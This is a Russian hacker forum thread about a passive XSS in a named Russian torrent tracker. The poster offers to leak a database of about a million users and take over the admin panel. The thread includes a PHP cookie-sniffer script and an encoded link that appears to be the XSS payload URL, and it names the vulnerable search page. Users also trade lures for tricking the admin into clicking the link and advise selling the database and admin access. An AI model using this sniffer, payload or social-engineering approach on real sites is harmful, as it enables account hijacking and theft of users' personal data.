|
Xss в крупном Российском трекере
Пассивная XSS в крупнейшем Российском трекере (не торрентс)
За подробностями 643~770 --------------------------------------------------------------------------- Возможность слить БД (~1000000 пользователей) и получить доступ к Админ-Панели! |
Возможность слить БД
как ты через xxs бд будешь сливать?) |
.Striker
Ну давай подумаем: Код:
1. Получаем куки админа |
ты сначала получи куки и без палева слей её если получится :)
а потом отпиши если сайт крупный, то думаю тама за всем пасут |
Доступ в админ панель я получал.
Банальное сообщение: "У вас тут плохо сайт работает" Куки у меня и я админ! ------------------------------------------------------------------- Сейчас снифер античатовский прост не работает)) У кого есть альтернативный, пишите, наделаю скринов бд, сайта и админки Цитата:
З.Ы. Плиз без флуда ( = |
сниффер
<?php $ip = getenv("REMOTE_ADDR"); $rhost = getenv("HTTP_REFERER"); $input = getenv("QUERY_STRING"); $date=(date("d.m.y")); $time=(date("H:i")); $fp = @fopen("snif.txt", "a"); @fputs($fp, "Дата: [ $date ] Время: [ $time ] IP: $ip Хост: $rhost Инфа $input \n"); @fclose($fp); ?> |
Цитата:
|
Продавал бы тогда уж сразу бд
|
Цитата:
Цитата:
----------------------------------------------- Все предложения по поводу XSS в ПМ или ICQ |
XSS в сообщении, выглядит так: http://ipicture.ru/uploads/080717/3WqCBZY7Lf.jpg
|
Цитата:
|
geforse, если серьезно, то молодец, советую БД отдельно продать в одни руки, и админку в другие! ;)
и XSS в другие))) всего 3 чела, а цена будет стоить своего!:) |
Цитата:
|
Сори чувак, но найти ее было очень просто ..
Код:
NjggNzQgNzQgNzAgM2EgMmYgMmYgNzQgNjYgNjkgNmMgNjUgMmUgNzIgNzUgMmYgMGQgMGEgYzIgZjEgZTUgZTMgZWUgMjAgZTcgZTAgZjAgZTUgZTMgZTggZjEgZjIgZjAgZTggZjAgZWUgZTIgZTAgZWQgZWQgZmIgZjUgMjAgZWYgZWUgZWIgZmMgZTcgZWUgZTIgZTAgZjIgZTUgZWIgZTUgZTkgM2EgMjAgNWIgNDIgNWQgMzEgMzIgMzAgMzAgMzggMzMgMzIgNWIgMmYgNDIgNWQgMGQgMGEgMGQgMGEgNjggNzQgNzQgNzAgM2EgMmYgMmYgNzQgNjYgNjkgNmMgNjUgMmUgNzIgNzUgMmYgNjYgNmYgNzIgNzUgNmQgMmYgNzMgNzMgNjUgNjEgNzIgNjMgNjggMmUgNzAgNjggNzAgM2YgNzEgM2QgMjIgM2UgM2MgNzMgNjMgNzIgNjkgNzAgNzQgM2UgNjEgNmMgNjUgNzIgNzQgMjggMjIgNDIgNmMgNjEgNjMgNmIgNTMgNzUgNmUgMjIgMjkgM2IgM2MgMmYgNzMgNjMgNzIgNjkgNzAgNzQgM2UgMjYgNjYgM2QgMzEgMzcgMjYgNjcgM2QgMjYgNzEgNmMgM2QgMzAgMjYgNjEgM2QgMjYgNjQgM2QgMjYgNjkgNmYgM2QgMzEgMjYgNmYgM2QgMjYgNjMgNzAgM2QgMzEgMjYgNzMgNmMgNzQgM2QgMzAgMjYgNzMgNjcgNzQgM2QgMzA= |
BlackSun АХАХАХАХАХ ТРУ ХАКЕР)!)
ПРЯМ ОБЛОМЩЕК :D |
да уж =) щя все админа заспамят
|
ОГРОМНОЕ СПАСИБО, ПОЛЬЗОВАТЕЛИ АЧЧАТА
ТОЛЬКО НАСТОЯЩИЕ КУЛХАЦКЕРЫ ТАК МОГЛИ ПОСТУПИТЬ....я всегда считал, что тут люди помогают друг другу, а НЕ ГАДЯТ....ещё раз всем спасибо |
бугага)) ор
|
Паццтолом!))
|
это жестоко - но так бывает ..
|
и чо?
|
BlackSun, респект ;) Жаль в репутацию поставить не могу + :)
|
А за сколько продать хотел? Не растраивайся, продай акк админа!
|
надо было самому БД сливать...
|
не расстраивайся
нашел одну найдешь и вторую и третью... с одной стороны BlackSun молодец, красавец и тд и тп... а с другой стороны ну ни хорошо так делать моя точка зрения что BlackSun поступил не правельно |
Щяс с Админом Торрентс ру говорил, он первый с кем я в инете познакомился :)
Карочи говоря если ты даже сесию админа спиздиш бд у тебя не будет ;) |
^^
|
Цитата:
http://forum.antichat.ru/showpost.ph...postcount=1948 |
У него типа в ssearch.php
|
Тока там же пых-пых Б..Б..
Какая админка млин? без пароля админа. Это явное полоскание мозгов. |
Если получить куки админа, который только что побывал в админке, доступ в в админ панель гарантирован.
Просто письмо: Cмените мне ник, я вам дам 5wmz и админ в админке, а куки мои. |
Цитата:
|
А не тут - http://tfile.ru/forum/ssearch.php случайно ? :)
|
| Время: 10:43 |